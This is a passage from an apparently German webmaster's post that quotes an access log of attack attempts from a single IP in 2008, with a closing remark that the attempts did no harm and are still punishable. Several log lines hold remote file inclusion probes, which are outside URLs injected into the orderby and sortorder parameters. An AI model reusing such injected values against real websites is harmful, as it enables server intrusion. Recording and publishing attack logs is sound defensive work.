etkinlik%2Finclude%2Feto%2Fnixaz%2F
02-03-08 / 21:12:08 – 72.232.44.170 – /index.php?page=faq
02-03-08 / 21:12:10 – 72.232.44.170 – /index.php
02-03-08 / 21:12:16 – 72.232.44.170 – /?orderby=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fitofu%2F
viroja%2F&sortorder=asc
02-03-08 / 21:12:17 – 72.232.44.170 – /?orderby=http%3A%2F%2Fsinzinuri.com%2Fimsi%2Fdb%2Fpic%2Fbezefi%2Fugoye%2
F&sortorder=asc
02-03-08 / 21:12:19 – 72.232.44.170 – /?orderby=http%3A%2F%2Fwww.tureksfuar.com.tr%2Fjoomla%2Fmambots%2Fconten
t%2Fugi%2Fvipo%2F&sortorder=asc
02-03-08 / 21:12:20 – 72.232.44.170 – /?orderby=sincedate&sortorder=http%3A%2F%2Fwww.electrofed.com%2F_app%2Fefc
%2Fodoqu%2Fferus%2F
02-03-08 / 21:12:21 – 72.232.44.170 – /?orderby=sincedate&sortorder=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%
2Fcorreo%2Fenaq%2Fecib%2F
02-03-08 / 21:12:22 – 72.232.44.170 – /?orderby=sincedate&sortorder=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladm
in%2Flibraries%2Foduzov%2Fneloze%2F
02-03-08 / 21:12:24 – 72.232.44.170 – /index.php?page=login
02-03-08 / 21:12:29 – 72.232.44.170 – /index.php?page=showarticle&articleid=1
02-03-08 / 21:12:31 – 72.232.44.170 – /?orderby=sincedate&sortorder=asc
02-03-08 / 21:12:33 – 72.232.44.170 – /?orderby=age&sortorder=asc

Naja, es hat keiner der Amateure Schaden angerichtet, jedoch, schon der Versuch ist strafbar!

Viele Grüsse

Der Webmaster